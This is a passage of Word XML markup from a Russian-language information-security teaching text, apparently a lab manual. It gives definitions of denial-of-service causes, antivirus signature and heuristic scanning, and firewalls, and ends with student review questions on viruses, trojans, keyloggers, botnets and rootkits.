          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>у</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>емому фрагменту адресного пространства, выполнению недопустимой и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>н</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>струкции или другой необрабатываемой исключительной ситуации, когда пр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>исходит аварийное завершение серверного приложения. Классическим прим</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ром является обращение по нулевому (англ. null) указателю. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2. Недостаточная проверка данных пользователя, приводящая к беск</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>нечному либо длительному циклу или повышенному длительному потребл</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>нию процессорных ресурсов (исчерпанию процессорных ресурсов) либо выд</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">лению большого объёма оперативной памяти (исчерпанию памяти). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3. Флуд (англ. flood) — атака, связанная с большим количеством обычно бессмысленных или сформированных в неправильном формате запросов к ко</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>м</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">пьютерной системе или сетевому оборудованию, имеющая своей целью или приведшая к отказу в работе системы из-за исчерпания ресурсов системы — процессора, памяти либо каналов связи. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4. Атака второго рода — атака, которая стремится вызвать ложное сраб</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">тывание системы защиты и таким образом привести к недоступности ресурса. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Если атака (обычно флуд) производится одновременно с большого кол</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>чества IP-адресов, то в этом случае она называется распределённой атакой на отказ в обслуживании (DDoS).</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szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Инструменты защиты от вредоносных программ</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Антивирусная программа (антивирус) — программа для обнаружения компьютерных вирусов, а также нежелательных (считающихся вредоносными) программ вообще, и восстановления зараженных (модифицированных) такими программами файлов, а также для профилактики — предотвращения заражения (модификации) файлов или операционной системы вредоносным кодом</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b/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Основные методы поиска вирусов</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szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Поиск по сигнатурам:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Это метод, при котором антивирусная программа, анализируя файл, о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>б</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ращается к антивирусным базам, составленные производителем программы-антивируса. В случае соответствия какого-либо участка кода просматриваемого файла (сигнатуре) вируса в базах, программа-антивирус может по запросу в</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ы</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>полнить одно из следующих действий:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Удалить инфицированный файл. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Заблокировать доступ к инфицированному файлу. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Отправить файл в карантин (то есть сделать его недоступным для выполнения с целью недопущения дальнейшего распространения вируса). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4.</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Попытаться «вылечить» файл, удалив тело вируса из файла. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5.</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t>В случае невозможности лечения/удаления, выполнить эту проц</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">дуру при следующей перезагрузке операционной системы. </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Вирусная база регулярно обновляется производителем антивирусов, пользователем рекомендуется обновлять их как можно чаще.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Некоторые из продуктов для лучшего обнаружения используют нескол</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ь</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ко ядер для поиска и удаления вирусов и программ-шпионов. Например, в ра</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>з</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>работке NuWave Software используется одновременно пять ядер (три для пои</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ков вирусов и два для поиска программ-шпионов).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Для многих антивирусных программ с базой сигнатур характерна прове</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>р</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ка файлов в момент, когда операционная система обращается к файлам. Таким образом, программа может обнаружить известный вирус сразу после его пол</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>у</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>чения. При этом системный администратор может установить в антивирусной программе расписание для регулярной проверки (сканирования) всех файлов на жёстком диске компьютера.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Хотя антивирусные программы, созданные на основе поиска сигнатур, при обычных обстоятельствах могут достаточно эффективно препятствовать заражению компьютеров, авторы вирусов стараются обойти такие антивирусы, создавая «олигоморфические», «полиморфические» и «Метаморфизм (безопа</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ность) метаморфические» вирусы, отдельные части которых шифруются или искажаются так, чтобы было невозможно обнаружить совпадение с записью в сигнатуре.</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szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Эвристический анализ</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В целом термином «эвристический анализ» сегодня называют совоку</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>п</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ность функций антивируса, нацеленных на обнаружение неизвестных виру</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ным базам вредоносных программ, но в то же время этот же термин обозначает один из конкретных способов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Эвристическое сканирование в целом схоже с сигнатурным, однако, в о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>т</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>личие от него, ищется не точное совпадение с записью в сигнатуре, а допуск</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ется расхождение. Таким образом становится возможным обнаружить разн</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>видность ранее известного вируса без необходимости обновления сигнатур. Также антивирус может использовать универсальные эвристические сигнатуры, в которых заложен общий вид вредоносной программы. В таком случае ант</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>вирусная программа может лишь классифицировать вирус, но не дать точного названия.</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b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Межсетевой экран или Фаерволл или сетевой экран</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> — комплекс а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>п</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>паратных или программных средств, осуществляющий контроль и фильтрацию проходящих через него сетевых пакетов на различных уровнях модели OSI в соответствии с заданными правилами.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Основной задачей сетевого экрана является защита компьютерных сетей или отдельных узлов от несанкционированного доступа. Также сетевые экраны часто называют фильтрами, так как их основная задача — не пропускать (фил</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ь</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>тровать) пакеты, не подходящие под критерии, определённые в конфиг</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>у</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>рации.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Некоторые сетевые экраны также позволяют осуществлять трансляцию адресов — динамическую замену внутрисетевых (серых) адресов или портов на внешние, используемые за пределами ЛВС.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>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pStyle w:val="90"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="709" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="004E7A8F" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:ind w:left="426" w:hanging="426"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="004E7A8F" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:ind w:left="426" w:hanging="426"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="004E7A8F" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="90"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="426" w:hanging="426"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="004E7A8F" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="138"/>
        </w:numPr>
        <w:ind w:left="426" w:hanging="426"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E7A8F">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Что такое вирус?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="004E7A8F" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="138"/>
        </w:numPr>
        <w:ind w:left="426" w:hanging="426"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E7A8F">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Какие способы проникновения вредоносного ПО вам известны?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="004E7A8F" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="138"/>
        </w:numPr>
        <w:ind w:left="426" w:hanging="426"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E7A8F">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Что такое «троянская конь»?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="004E7A8F" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:left="426" w:hanging="426"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="004E7A8F" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="138"/>
        </w:numPr>
        <w:ind w:left="426" w:hanging="426"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E7A8F">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Что такое кейлоггер?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="004E7A8F" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="138"/>
        </w:numPr>
        <w:ind w:left="426" w:hanging="426"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E7A8F">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Что такое ботнет и компьютер-зомби?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="004E7A8F" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:left="426" w:hanging="426"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="004E7A8F" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:ind w:left="426" w:hanging="426"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E7A8F">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ВОПРОСЫ И ЗАДАНИЯ ДЛЯ ЗАЩИТЫ РАБОТЫ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="004E7A8F" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:ind w:left="426" w:hanging="426"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="004E7A8F" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="90"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="426" w:hanging="426"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="004E7A8F" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="139"/>
        </w:numPr>
        <w:ind w:left="426" w:hanging="426"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E7A8F">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Что такое руткит?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="004E7A8F" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="139"/>
        </w:numPr>
        <w:ind w:left="426" w:hanging="426"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E7A8F">
        <w:rPr>
